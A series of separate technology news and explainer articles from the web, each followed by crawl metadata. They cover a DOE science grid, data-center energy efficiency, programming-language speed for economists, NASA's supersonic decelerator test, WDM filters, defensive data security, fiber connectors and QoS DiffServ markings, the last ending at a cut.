The grid eventually will offer scientists and researchers across the country real-time access to trillions of bytes of data stored at labs nationwide, according to IBM.
are designed to allow quick access to applications, data and computing resources housed at distant locations. While similar in some ways to the Internet, grids offer far greater advantages by enabling users to tap the computing power of potentially thousands of systems attached to the grid simultaneously, creating a virtual supercomputer.
Efforts to develop grids are underway in various countries throughout the world. Last summer, Britain announced plans to build a national grid linking nine research centers and the National Science Foundation announced it would link four of its U.S. supercomputing centers into a power grid network.
A major challenge to developing grids centers on creating common protocols to enable computers utilizing different proprietary hardware and software to not only communicate with each other, but interact almost as closely as if they were all using one operating system.
The IBM and DOE grid will be based on clusters of servers joined together over the Internet using protocols developed in conjunction with the Globus open source community, as well as other open source technologies, such as Linux.
While most current grid projects are primarily focus on aiding government and scientific research, IBM representatives said the technology could eventually find its way into commercial use.
"The DOE Science Grid is a template for the kind of system that can enable partnerships between public institutions and private companies aimed at creating new products and technologies for business," said Val Rahmani, general manager of IBM eServer, pSeries.
Eventually, IBM, Armonk, N.Y., believes there will come a time when companies and private individual may actually purchase computing power in a way not that unlike how customers currently buy electricity, essentially paying for what they use.
"This collaboration is a big step forward in realizing grids promise of delivering computing resources as a utility-like service," Rahmani said.
In taking the first steps to build out the grid, IBM and the National Energy Research Scientific Computing Center (NERSC), a part of the Department of Energy, said Friday that they have successfully integrated the first high-performance computers and storage devices into the grid.
Among the systems connected was a 3,328-processor IBM supercomputer used by the NERSC. That system is listed as the third most powerful computer in the world, according to the TOP500 List of Supercomputers.
In addition to the large supercomputer system, grid software will be integrated into NERSCs High Performance Storage System archival data storage system, which has a capacity of 1.3 petabytes and is managed using IBM servers.
The primary goal of the new grid, according to the DOE, will be to enable scientists at national laboratories and universities around the country to perform ever-greater calculations, manage and analyze ever-larger datasets, and perform more complex computer modeling necessary for DOE to accomplish its scientific missions.
The NERSC is located at the DOEs Lawrence Berkeley National Laboratory in Berkeley, Calif. | <urn:uuid:62e6c4b0-acec-4bf7-b805-f2d1c1756e8d> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Cloud-Computing/Energy-Agency-Puts-Data-On-A-MegaGrid | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00225-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945136 | 700 | 2.859375 | 3 |
The Post-Green EraBy Samuel Greengard | Posted 2009-02-22 Email Print
A good energy policy can supercharge an organization’s performance through direct electricity savings, a diminished need for facilities, and lower capital costs related to servers, storage and other devices.
The Post-Green Era
Only a few years ago, the concept of going green was reserved mostly for tree-hugging environmentalists bent on making the world a better place. Today, business and IT are heading into a bold new era that could easily be called post-green. However, many executives—and companies—are still out of touch with the need to boost data center energy efficiency and build a more optimized IT infrastructure.
“For years, there hadn’t been a big emphasis on energy consumption,” says Simon Mingay, research vice president for Gartner. “Power was cheap and plentiful, and price wasn’t a limiting factor. There also hadn’t been much of a focus on greenhouse emissions. But the current economic downturn is forcing organizations to look at costs more closely than ever.”
According to the U.S. Environmental Protection Agency (EPA), the nation’s servers and data centers consumed approximately 61 billion kilowatt-hours in 2006—double 2000’s consumption. And there’s no end in sight. The same EPA report says energy consumption could double again by 2011—even with more efficient systems and better monitoring methods.
Meanwhile, consulting firm McKinsey reports that information and communications technologies—including laptops and PCs, data centers and computing networks, mobile phones and telecommunications networks—could be among the biggest greenhouse gas emitters by 2020.
Many companies are beginning to take action. At Highmark, for example, the introduction of a new corporate data center in November 2005 represented an opportunity to embrace more energy-efficient practices. The company launched its initiative with a U.S. Green Building Council Leadership in Energy and Environmental Design (LEED)-certified facility. It features an Energy Star roof that collects rainwater and stores it in a 100,000-gallon underground tank. It’s used for gray water in restrooms and in cooling towers for the data center (the system evaporates 1,200 gallons of water each day). The building also includes smart lighting systems.
But the company didn’t stop there. Highmark, using energy auditing tools and consulting expertise from IBM, then conducted a thermal analysis of its data center and determined how to space servers and racks for maximum performance and reduced cooling costs. “The important thing was to understand every piece of equipment and what was actually drawing the power,” says Wood, who discovered that 80 percent of the firm’s business transactions were pulling only 20 percent of the power.
“We found that a lot of servers in our data center weren’t being used, even though they were powered up,” Wood continues. “So, the first thing we did was power down those servers when they weren’t in use. Most data centers operate in always-on mode, but we wanted to go to an on-off approach.”
At the same time, IT began switching off unused systems in burning rooms and taking a closer look at how employees used their computers. Finally, the company adopted a server virtualization and consolidation strategy. As a result, three-quarters of Highmark’s 400 servers are now virtualized.
“We picked the low-hanging fruit and then began to look for more opportunities,” Wood recalls. The bottom line? Highmark cut kilowatt-hours by 500,000 during 2008, which represents a net savings of approximately $52,000 on the electric bill. That decrease is significant, he says, noting that “in 2010, the rate caps will be lifted by our local utility company, and that will increase our electric bill by 20 percent to 40 percent.”
In addition, through virtualization, Highmark has reduced equipment demands—and the resulting energy requirements—by a 14-1 ratio. The firm also has slashed overall energy consumption by 10 percent to 12 percent.
Highmark is now looking to adopt disk virtualization and to possibly use wind and solar technologies to help power the data center. “We do not have an unlimited budget, so we have to pick our battles and ensure that we’re achieving maximum results and ROI,” Wood explains. | <urn:uuid:bccdb8a9-f7c3-420f-889e-6835745cc11e> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/IT-Management/Building-an-EnergyEfficient-IT-Infrastructure/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00098-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94835 | 923 | 2.59375 | 3 |
Lots of non-programmers seem to be learning how to program these days. However, one group of non-programmers who have been programming for a long time are economists. They often have to write code in order to run and evaluate their complex mathematical models and simulations. If you’re an economist, then, faced with having to do some coding, which programming language is best for your use?
Two economists, S. Boragan Aruoba of the University of Maryland and Jesus Fernandez-Villaverde of the University of Pennsylvania, recently set out to answer that question. The results are contained in a new paper published by the National Bureau of Economic Research titled A Comparison of Programming Languages in Economics (Fernandez-Villaverde has the made the full paper available for download). Their basic approach was to compare the time it took a handful of programming languages commonly used by economists to solve a well-known economic model.
Specifically, the model they chose to solve is the stochastic neoclassical growth model, considered a “workhorse” in the field, using an algorithm which is representative of the computing economists need to do. They coded the problem in three compiled languages (C++, Fortran, Java) using a variety of compilers and five scripting languages (Julia, Python, Matlab, Mathematica, R) and ran the programs on two platforms, Windows and Mac. The languages were then evaluated based on their code execution time.
Their paper lays out the full set of elapsed time results for all the language/compiler/platform combinations. Here are the top-level takeaways.
C++ is the fastest programming language for economists
While Fortran is a very popular choice for economists, it was the C++ that ran the fastest on both Mac and Windows. The elapsed time for C++ compiled with GCC was 0.73 seconds on the Mac, while it was 0.76 seconds for C++ compiled with Visual C++ on Windows. Fortran was a close second on both platforms; execution time on the Mac for Fortran compiled with GCC was 0.76 seconds, while on Windows, it was 0.81 seconds for Intel Fortran. The only other language to come close was Java, which had executions times of 1.95 seconds on Mac and 1.59 seconds on Windows, still twice as slow as C++ and Fortran.
Compiler choice matters
While C++ and Fortran dominated the other languages in performance time, the choice of compiler mattered significantly within those languages. Generally GCC compiled code ran significantly faster than Intel compiled code on the Mac, while the opposite was true on Windows, though the spread was greater on the latter. Intel-compiled code ran about twice as fast as GCC-compiled code on Windows for both C++ (0.90 to 1.73 seconds) and Fortran (0.81 to 1.73).
Scripting languages were considerably slower than compiled ones
Not surprisingly, scripting languages fared worse than compiled languages, but sometimes a whole lot worse. Julia did the best, coming in close to Java, about twice as slow as C++. Matlab was about 10-times slower than C++ on both Mac and Windows, while Python code ranged from being about 40-times slower than C++ on both Mac and Windows (for Pypy) to well over 200-times slower (CPython) on the Mac. R ranged from 500 to 700-times slower, while Mathematica did the worst, being 800-times slower than C++ on the Mac. The authors did find, however, that the performance of scripting languages could be greatly increased by compiling parts of the code when possible. Matlab speed goes to just twice as slow as C++ when compiling into Mex (C++) files, with a similar increase found for Python with Numba.
One of the important caveats of the study is that the researchers made no attempt to use special features of each language to optimize the code, instead opting for similar implementations across the languages as a way to control for programmer skill and because it would make comparison difficult.
What does this research mean for the general population of software developers? Probably not much, since professional programmers with deep knowledge of these languages could optimize the code and, presumably, come up with very different results. In fact, the authors have made their code available on GitHub, so if you’d like to see how the language perform when optimized, have at it.
How relevant are these findings, though, for economists? Even that’s questionable, since the choice of programming language will depend on things other than code execution time, like learning curve. Plus, different languages may be better for solving different kinds of problems. Finally, execution time may ultimately not matter much to economists anyways, so long as they can get a reliable solution using a language they know. But, if you’re a young economist trying to decide what language to invest some time in learning, these results suggest that C++ is the way to go.
In any case, I still find it interesting that a non-programming profession which does quite a bit of coding is making a serious effort to consider which language is best. The authors plan to consider the performance of functional programming languages in a forthcoming paper. I’ll report back on that once the paper is available.
Read more of Phil Johnson's #Tech blog and follow the latest IT news at ITworld. Follow Phil on Twitter at @itwphiljohnson. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:93c75b7e-89b1-4d31-9f63-3f4f7f8cfb8d> | CC-MAIN-2017-04 | http://www.itworld.com/article/2696218/big-data/if-you-re-an-economist--c---is-the-programming-language-for-you.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00216-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957772 | 1,152 | 2.9375 | 3 |
NASA wants to send ever-heavier spacecraft – along with humans at some point – to Mars and to make that feasible it will need a system that can slow down that equipment for a safe landing.
Taking some of the first step to develop that system will be a distinctly flying saucer-like test vehicle that will some time in the next two week blast off from the U.S. Navy's Pacific Missile Range Facility in Kauai, Hawaii for what NASA calls its first engineering shakeout flight.
+More on Network World: NASA setting up $250,000 Mars lander competition+
NASA says it is developing three flying saucer, or rather Low Density Supersonic Decelerator (LDSD) systems. The first two are supersonic inflatable aerodynamic decelerators -- very large, durable, balloon-like pressure vessels that inflate around the entry vehicle and slow it from Mach 3.5 or greater to Mach 2 or lower.
These decelerators are being developed in 6-meter-diameter and 8-meter-diameter configurations, NASA said. Also in development is a 30.5-meter-diameter parachute that will further slow the entry vehicle from Mach 1.5 or Mach 2 to subsonic speeds. All three devices will be the largest of their kind ever flown at speeds several times greater than the speed of sound, NASA said.
The six-meter version will be the one tested over the Pacific first.
Here’s what the mission looks like:
- NASA plans to use the very thin air found high in Earth’s stratosphere as a test bed for the LDSD mission.
- To reach the desired altitude of 120,000 feet, the LDSD project will use a helium-filled scientific balloon provided by NASA’s Wallops Flight Facility and Columbia Scientific Balloon Facility. When fully deployed, the balloon is over 34 million cubic feet. At that size alone, one could fit a professional football stadium inside it. The material that makes the balloon, a very thin film called polyethylene that is similar thickness to that of sandwich wrap, will lift the massive test article to 120,000 feet.
- At that altitude, the test article will be detached from the balloon and a Star 48B long-nozzle, solid-fueled rocket engine will be employed to boost the test article on a trajectory to reach supersonic speeds (Mach 4) needed to test the 6-meter supersonic inflatable aerodynamic decelerator (SIAD-R) and the supersonic parachute operate a full year ahead of schedule.
- The SIAD-R, essentially an inflatable doughnut that increases the vehicle's size and, as a result, its drag, is deployed at about Mach 3.8. It will quickly slow the vehicle to Mach 2.5 where the parachute, the largest supersonic parachute ever flown, first hits the supersonic flow.
- Once at supersonic speeds, the deployment and function of the inflatable decelerators will be tested to slow the test article to a speed where it becomes safe to deploy a supersonic parachute (about Mach 3.8). About 45 minutes later, the saucer is expected to make a controlled landing onto the Pacific Ocean.
- The balloon and test article will all be recovered.
"The success of this experimental test flight will be measured by the success of the test vehicle to launch and fly its flight profile as advertised. If our flying saucer hits its speed and altitude targets, it will be a great day," said Mark Adler, project manager for the Low Density Supersonic Decelerator at NASA's Jet Propulsion Laboratory (JPL) in Pasadena, California.
The other two supersonic decelerator technologies will be thoroughly tested during two LDSD flight tests next year, NASA stated.
The point to all of this is to increase the size of the payload NASA can deliver to the Mars surface. These new drag devices can increase payload delivery to the surface of Mars from our current capability of 1.5 metric tons to 2 to 3 metric tons, depending on which inflatable decelerator is used in combination with the parachute, NASA said. They will increase available landing altitudes by 2-3 kilometers, increasing the accessible surface area we can explore. They also will improve landing accuracy from a margin of 10 kilometers to just 3 kilometers.
Check out these other hot stories: | <urn:uuid:0ab88eb9-e3a4-432a-89c8-036a070ea9f9> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2357768/security0/nasa-set-to-blast-mars-flying-saucer-over-the-pacific.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280128.70/warc/CC-MAIN-20170116095120-00520-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.912352 | 915 | 3.09375 | 3 |
The optical devices most often used to selectively transmit certain wavelengths are called filter, which covers a broad range of devices, including attenuators. Filters play important roles in Wavelength Division Multiplexing(WDM) systems, although other technologies also may be used. WDM Filters can separate or combine optical signals carried on different wavelengths in a cost-effective manner.
In the world of optics, “filter” often is a broad term applied to components that filter out part of the incident light and transmit the rest. In WDM systems, the wavelengths that are not transmitted through the filter normally are reflected so they can go elsewhere in the system. Such filters are like mirror shades or one-way mirrors, which reflect most incident light, but transmit enough for you to see through them.
Common optical filters accommodate channel growth without service interruption. In addition, the filters’ low network-to-express loss allows stacking, which is essential for scaling new wavelengths. Most filters are equipped with an express port to pass through non-dropped/added WDM channels. Interconnecting express ports of two filters forms an Optical Add/Drop Multiplexer (OADM) with east/west fiber connections. High filter isolation eliminates disruptive “shadow” wavelengths and allows channels that have been dropped at a node to be used elsewhere downstream.
Interference filters and other technologies can be used to separate and combine wavelengths in WDM systems. Several approaches are now competing for WDM applications, some technologies appear to have advantages for certain types of WDM systems, but the field is still evolving, and no single approach dominates. Although these technologies work in different ways, they can achieve the common goal of optical multiplexing and demultiplexing.
There are three competing filtration technologies: Thin Film Filters (TFF), Array Waveguides (AWG), and Fiber Bragg Gratings (FBG). Thin film filters were adopted very early and have been widely deployed because they have the unique attributes that meet the stringent requirements of optical communication systems.
Wide band WDM filters – They are used in EDFAs as pump couplers and supervisory channel monitors. This family of filters covers a wide variety of other filters. Their applications range from CWDM (Coarse WDM), to bi-directional transceivers, to 1310/1490/1550 nm tri-band filters for fiber to the home (FTTH).
Fiber Bragg gratings work similarly by reflecting specific wavelengths. WDM applications require the use of many interference filters or fiber gratings, with each one picking off an individual wavelength or group of wavelengths.
FTTX Filter WDM module is based on thin film filter technology. FiberStore Filter-Based WDM product family covers following wavelength windows commonly used in optical fiber systems: 1310/1550nm (for WDM or DWDM optical communications), 1480/1550nm (for high-power DWDM optical amplifier/EDFA), 1510/1550nm (for DWDM multi-channel optical networks) and 980/1550nm (for high performance DWDM optical amplifier/EDFA) and 1310/1490/1550nm (for PON/FTTX/test instrument). Compared with fused fiber WDM couplers, filter-based WDM components have much wider operating bandwidth, lower insertion loss, higher power handling, high isolation, etc. | <urn:uuid:01a23eb6-63ff-4d06-9e25-17debb22c966> | CC-MAIN-2017-04 | http://www.fs.com/blog/things-you-should-know-about-wdm-filter.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00364-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.924822 | 710 | 3.78125 | 4 |
Electronic data resides in two basic areas:
- In bulk in some form of repository, such as a database or collections of individual files (called data at rest)
- In small quantities being transmitted over a network (called data on the wire)
Your data is vulnerable no matter where it resides. While most companies take security precautions, many of those precautions turn out to be insufficient to protect valuable corporate assets. The key lies in knowing where vulnerabilities exist and making appropriate risk-based decisions.
The ability to gather and share volumes of information was the primary reason behind the creation of the Internet, but such wide availability greatly magnifies the risk of that information being compromised. Attacks against large databases of critical information are on the rise, such as in the following recent cases:
- February, 2003: A hacker broke into the security system of a company that processes credit card transactions, giving the hacker access to the records of millions of Visa and MasterCard accounts.
- June, 2004: More than 145,000 blood donors were warned that they could be at risk for identity theft from a stolen university laptop containing their personal information.
- October, 2004: A hacker accessed names and social security numbers of about 1.4 million Californians after breaking into a University of California, Berkeley computer.
NOTE – Identity theft occurs when someone uses your personal information—such as your name, social security number, credit card number, or other identifying information—without your permission, frequently to commit fraud or other crimes.
Vulnerabilities of Data on the Wire
Data on the wire is vulnerable to some very focused attacks. Data can be intercepted (sniffed). ARP attacks can be used to sniff information in a switched environment. ARP attacks can also be used to initiate “man in the middle” attacks that can allow an attacker to intercept and potentially modify information in transit.
Sniffing refers to a technique for capturing network traffic. While sniffing can be accomplished on both routed and switched networks, it’s much easier in a routed environment:
- Layer 3 devices, such as routers, send information by broadcasting it to every destination on the network, and the destination handles the problem of parsing out the specific information that’s needed from the general broadcast.
- In a switched environment, switches send traffic only to its intended host (determined by the destination information in each individual packet).
Operating in a switched environment doesn’t totally alleviate the risk of sniffing, but it does mitigate that risk to a large degree.
Most networks today also utilize virtual LAN (VLAN) configurations to segment network traffic and further reduce the risk of sniffing. A VLAN is a switched network that’s logically segmented. VLANs are created to provide the segmentation services traditionally provided by routers in LAN configurations. VLANs address scalability, security, and network management. Routers in VLAN topologies provide broadcast filtering, security, address summarization, and traffic-flow management.
Just as switches isolate collision domains for attached hosts and only forward appropriate traffic out a particular port, VLANs provide complete isolation between VLANs. None of the switches within the defined group will bridge any frames—not even broadcast frames—between two VLANs. Thus, communication between VLANs is accomplished through routing, and the traditional security and filtering functions of the router can be used.
Segmentation can be organized in any manner: function, project team, application. This capability is especially useful for isolating network segments for security purposes. For example, you may place application servers on one VLAN and system administrators on another (management-level) VLAN, with access control lists to restrict administrative access to only that VLAN. This setup can be accomplished regardless of physical connections to the network or the fact that some users might be intermingled with other teams.
The Ethernet Address Resolution Protocol (ARP) enables systems to find the unique identifier (MAC address) of a destination machine. ARP attacks provide the means to either break or misuse the protocol, with the goal of redirecting traffic from its intended destination. In an ARP attack, the attacker can sniff, intercept, and even modify traffic on a compromised network segment.
The effectiveness of these attacks is limited in two ways:
- Data on the wire is generally available only in small pieces. It’s true that many systems and applications send login/password pairs in clear text (without any encryption). An attack may capture such small bits of data; it may even be possible over time to assemble enough useful information to make identity theft possible. However, the attacker must either be directly connected to the internal network, or have succeeded in compromising an internal system and installing some form of sniffer to gather information. For the effort to be worthwhile to the hacker, many small chunks would need to be captured and then filtered out of the massive volumes of traffic traversing most of today’s networks; and then the captured data would have to be reassembled into meaningful information. This is a tremendous task with a potentially very small payoff.
- Capturing data takes time. The longer the attacker is inside the network, the more likely he or she is to get caught. It’s easier to get information at the source, rather than trying to capture and decode thousands of network packets.
Vulnerabilities of Data at Rest
While sniffing data on the wire may yield a big reward, data at rest is the proverbial pot of gold. Most organizations maintain detailed databases of their personnel information, for example, making the large corporation a very tempting target. These databases regularly contain quantities of names, addresses, and even social security numbers for tax purposes. This is all the information that someone needs to steal your identity. Statistics show that identity theft attacks are increasing. More than thirty thousand victims reported ID theft in 2000; in 2003, the Federal Trade Commission received more than half a million complaints.
A major issue in protecting your data repository is the fact that there are so many avenues of attack. Attacks can be launched against the operating system, the database server application, the custom application interface, the client interface, and so on. Application attacks don’t have to be directed against the target application, either. Any attack providing system-level access to an attacker is a risk to your data.
Your system is also a potential target for a multitude of computer viruses, worms, and Trojans. Current reports put the number of these types of applications at more than 100,000. Many recent computer worms leave systems vulnerable by covertly installing a backdoor that enables the attacker to enter the system at will.
How Can We Protect Our Data?
How do we defend against so many possible attack vectors? The key is to focus on the data. The first step should be data-sensitivity analysis as part of an overall risk-assessment process. Data-sensitivity analysis begins by identifying an organization’s critical data and ways in which that data is used. Once the sensitivity of data has been classified, the organization can reach decisions about the necessary level of protection for that data. Your tendency may be to apply the greatest level of protection available, but that level may be neither necessary nor cost-effective. For example, you wouldn’t spend $100,000 on a firewall to protect an expected loss of only $5,000. You can get a better idea of how to apply countermeasures if you include a loss/impact analysis as part of the risk-assessment process.
A simple approach to data protection looks at the various layers of security that can be applied. Consider the following starting checklist:
- Do you need to encrypt the data repository?
- Do you need a hash of the transactions for integrity purposes?
- Should you digitally sign transactions?
- Make sure that database logging is enabled and properly configured.
- Harden the operating system.
- Disable unnecessary services and close ports.
- Change system defaults.
- Don’t use group or shared account passwords.
- Lock down file shares.
- Restrict access to only necessary personnel.
- Consider host-based firewalls and intrusion detection for critical servers.
- Maintain proper patch procedures.
- Use switches rather than routers or hubs as much as possible.
- Lock down unused router/switch ports.
- Consider MAC filters for critical systems.
- Establish logical subnets and VLANs.
- Set up access control lists (ACLs) for access routes.
- Use ingress/egress filters, anti-spoof rules.
- Determine appropriate location and functionality for network-based firewalls and intrusion detection.
- Use encrypted logins or SSL for web-based sessions.
Physical security for data:
- Establish input/output handling procedures.
- Use physical access logs for server rooms and network operations centers.
- Document tape-handling procedures, tape rotation, offsite storage.
- Consider an alternate data center.
- Archiving: Where does your data go to rest in peace?
- Data destruction: Degauss, erase/overwrite, physical destruction?
- How is data handled when equipment is sent out for repair, replacement, or end of life?
This is just a quick list of points to consider. Fortunately, folks much smarter than I am have developed a much more comprehensive approach.
Security standards and guidance are available, especially for organizations that are part of or do business with the U.S. government. Through the work of various organizations, the government has put together a program known as Certification & Accreditation (C&A). Standards have been and continue to be developed that provide guidance on the performance of risk assessments, development of security plans, and the application of security controls.
The Computer Security Division of the National Institute of Standards and Technology (NIST) has been assigned this important multi-part task:
- Improving federal information-systems security by raising awareness of IT risks, vulnerabilities, and protection requirements, particularly for new and emerging technologies.
- Researching, studying, and advising agencies of IT vulnerabilities and devising techniques for the cost-effective security and privacy of sensitive federal systems.
- Developing standards, metrics, tests, and validation programs.
- Developing guidance to increase secure IT planning, implementation, management, and operation.
The C&A process is explained and documented in NIST’s publications. NIST’s guidelines provide an excellent framework for selecting, specifying, employing, and evaluating the security controls in information systems.
Data is under constant attack from a growing number of sources. It’s vital that you know what data you have, how sensitive that data is, how critical it is to your corporate mission, and the risks it faces. Perform a risk assessment, and, once the threat level has been determined, develop an appropriate plan to protect that data with multiple layers of security. Only by being aware of your valuable assets can you properly monitor and protect them. | <urn:uuid:5cf80f0f-12fb-4e97-b855-53b48379bc6f> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2004/12/20/why-your-data-is-at-risk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00272-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910389 | 2,268 | 3.390625 | 3 |
Fiber Optic Connector has been widely used in fiber optic transmission lines, fiber optic patch panels and fiber-optic test instruments and meters. The Fiber Connector is one of the most essential components for fiber optic communication. It mate or connect with optical devices, modules, and fibers. Fiber connector is also the key part used in fiber Patch cord and fiber Pigtail.
In fiber optics design, when the system is capable of normal operation, if you are trying to build the local network or LAN in your home then you most probably know you will need a fiber patch cable and may be a hub or we achieved a very good results. Choosing a good fiber optic modem depends on a few factors, including availability. We need to consider not only some unexpected problems appear in the system design, but also expect the system to achieve the effect of normal operation. During the process of system design, we have to consider the worst case appear and related plans, is looking forward to improved operating results. In system design, security, stability and system access request the end of the fiber is smooth, neat. The connection between the clients must be accurate, micron accuracy or millionths of a meter. The diameter of the commonly used multi-mode fiber is from 50 to 62.5 microns, while the diameter of the single-mode fiber is only 8-9 microns. This size of the diameter of a human hair can (17-180 microns) are compared in diameter, and we can make sure that every trace of error can bring catastrophic losses.
With the expansion of technology development and application of fiber optic patch cables are also achieving rapid development. The types of fiber optic connectors on the market are probably 12 or more, each of which was launched to the specific needs, of course, came to meet, there are some technical limitations. The trend in the market is developing at a moderate price, compact plug-mode and all can support the requirements of the new transmission distribution system. As users expect that the ongoing development of the telecommunications industry also supports the large-scale application of the optical fiber, in large part due to the rapid growth of demand in the way of communication and entertainment services on the fiber link.
The fiber optic connection is very stringent accuracy of the equipment, the species of fiber patch cords are many kinds. So the connector must be very clean. Fiber optic connectors and accessories are usually mounted on a series of house, a fingerprint or external dust seriously affect the performance of the connector, and even the loss of communication. Therefore, the connector can be stored in clean protective sleeve without connection. Then we should also put fiber optic connector.
Fiber optic connectors according to the different transmission media can be divided into common silicon-based optical fiber single-mode and multimode connectors, as well as other issues such as plastic and as the transmission medium of optical fiber connector; connector structure can be divided into: FC SC, ST, LC, D4, DIN, MU, the MT and so on in various forms. The optical interface is the physical interface used to connect fiber optic cable. FiberStore as the main professional fiber optic products manufacturer in china offer a various kinds of fiber optic connectors, FC Connectors, LC Connectors, SC Connectors, ST Connectors. You can buy fiber optic connection products on our store with your confidence. All of fiber optics supplies with high quality but low price. | <urn:uuid:9487f42d-a1b0-4bfa-9ed6-6463757d402c> | CC-MAIN-2017-04 | http://www.fs.com/blog/the-application-of-fiber-optic-connector.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281649.59/warc/CC-MAIN-20170116095121-00574-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938491 | 692 | 2.734375 | 3 |
In the previous discussion on QoS the Per-Hop Behaviors DiffServ uses to mark packets were identified. These where listed as:
- Expedited Forwarding (EF) – RFC 3246 – Provides a strict priority service
- Assured Forwarding (AF) – RFC 2597 – Provides a qualified delivery guarantee, and provides for over-subscription, markdown and dropping schemes for excess traffic
- Class Selectors (CS) – RFC 2474 – Provides code points that can be used for backward compatibility with IP Precedence models
- Best-Effort – Provides delivery when possible
Layer 3 packets are marked with IP Precedence or Differentiated Services Code Points (DSCP) in the Type-Of-Service (TOS) byte that is in the IP Header. In order to understand QoS we must take a look at the TOS byte and understand what the eight bits are doing within this byte.
IP Precedence – RFC 1812
IP Precedence (IPP) is viewed by many as a legacy technology, but must still be observed for backwards compatibility.
The second byte in an IPv4 packet is the TOS byte. The first 3 bits are referred to as the IP Precedence bits. The IP Precedence bit only allows for eight values (0-7), generally 6 and 7 are reserved for network control traffic such as routing protocols. The value of 0 is normally reserved for default behavior, leaving only 5 values for traffic other than best effort behavior.
- IPP Value of 5 is recommended for voice
- IPP Value of 4 is recommended for interactive and streaming video
- IPP Value of 3 is recommended for call control and signaling
The IPP value of 1 and 2 are remaining markings for all data applications. This is commonly found to be too restrictive resulting in a move to the more scalable 6 bit 64 value Differentiated Services Code Point (DSCP).
The IPP bits are mainly used to classify packets at the edge of the network into one of the eight possible categories. Packets of lower precedence (lower values) can be dropped in favor of higher precedence when there is congestion on the network.
Differentiated Services Code Point (DSCP) – RFC 2474
DSCP uses the same three bits as IP Precedence uses as well as the next three bits for a total of six bits. Six bits provides for a range of 64 different DSCP values. These values can be expressed in numeric form or by keyword names, called per-hop behaviors (PHB). A collection of packets that has the same DSCP value in the TOS byte, and crossing in a particular direction is called a Behavior Aggregate (BA).
A PHB refers to the packet scheduling, queuing, policing, or shaping behavior of a node on any given packet belonging to a BA. The four standard PHBs are available to construct a DiffServ enabled network and achieve end-to-end QoS. The four PHBs are:
- Best Effort (BE) or DSCP 0, also known as default
- Assured Forwarding (AFxy) – 12 AF PHBs exist
- Expedited Forwarding (EF) – EF PHB has a DSCP value of 46, for time sensitive traffic such as voice
- Class-Selector (CSx) which have been designed to be backward compatible with IP Precedence
Assured Forwarding (AF) – RFC 2597
AF defines a method by which packets can be given different forwarding assurances. Traffic can be divided into different classes and then each class given a certain percentage of bandwidth. For example, one class could have 50% of the available link bandwidth; one class could have 30% and another 20% of the bandwidth.
Assured forwarding is denoted by the letters AF and then two digits. The first digit denotes the AF class and can range from 1–4. These first 3 bits of the AF correspond to IPP. The second digit refers to the level of drop probability within the AF class.
Something interesting to note about AF is the first 3 bits are the same for the three drop probabilities for each group. Also notice that a Class 1 AF would correspond to an IPP of 1, and a Class 2 AF would correspond to an IPP of 2 and so on.
- Class 1 AF PHB = 001
- Class 2 AF PHB = 010
- Class 3 AF PHB = 011
- Class 4 AF PHB = 100
The second digit, or the drop probability, functions in the following way during periods of congestion: the higher the number, the more likely the packet is to be dropped. For example, packets assigned AF13 will be dropped before packets in the AF12 class. This method will penalize flows with a BA that exceeds the assigned bandwidth. Packets of these flows could also be marked again by a policer to a higher drop precedence.
As you can see in the chart above, there are four main classes of data traffic, plus the default of Best-Effort.
Best effort traffic should be marked with DSCP 0. Adequate bandwidth should be assigned to the Best-Effort class as a whole because the majority of applications default to this class. It is recommended to reserve at least 25% for best effort traffic. In most networks there are hundreds, if not thousands, of applications that assign their IP packets to a default of DSCP 0. Consequently, adequate bandwidth needs to be provisioned to allow for the sheer volume of packets that will be placed in the default class. Examples of best-effort data applications:
- Noncritical traffic
- HTTP web traffic
Bulk Data are applications that are non-interactive and not drop sensitive. These are applications such as FTP, e-mail, back up operations, database synchronization and replication. These applications perform their tasks in the background. Bulk Data should have a moderate bandwidth guarantee but should be constrained from dominating a link.
Bulk Data should be marked as AF11, and excess bulk data can be marked down by a policer to AF12 or AF13. Examples of bulk data AF1 applications:
- Database synchronization
- Lotus Notes
- Microsoft Outlook
- POP 3
Transactional Data/Interactive Data
Transactional Data are client/server applications where the user normally waits for the transaction to happen in the foreground before proceeding on with the next action – as with database entry. This kind of client/server operation is different from applications such as e-mail where the processing of the email happens in the background and the user normally does not notice delays. Transactional data should have adequate bandwidth guarantee for interactive foreground operations that are supported.
Transactional data should be marked as AF21, and excess data can be marked down by a policer to AF22 or AF23. Examples of interactive AF2 applications
- Yahoo Instant Messenger
- Oracle Thin Client
Examples of transactional AF2 applications
- Microsoft SQL
- Oracle Database
Mission-Critical data is a locally defined class of traffic that is a non-technical, business critical class of transactional data. The majority of employees within the enterprise believe their traffic should receive premium class of service from the network. This issue can often become a politically charged debate over which traffic should be assigned to the premium class of traffic. It is recommended that as few applications as possible are assigned to this class of traffic. Mission Critical data should have adequate bandwidth guarantee for the interactive, foreground operations that it supports.
Mission Critical data should be placed in AF31, and excess data can be marked down by a policer to AF32 or AF33. As a note of interest, Cisco IP Telephony equipment (i.e. IP Phones) marked all call signaling traffic as AF31. With Communications Manager 4.0 and higher the call signaling has been marked at CS3.
Expedited Forwarding – RFC 2598
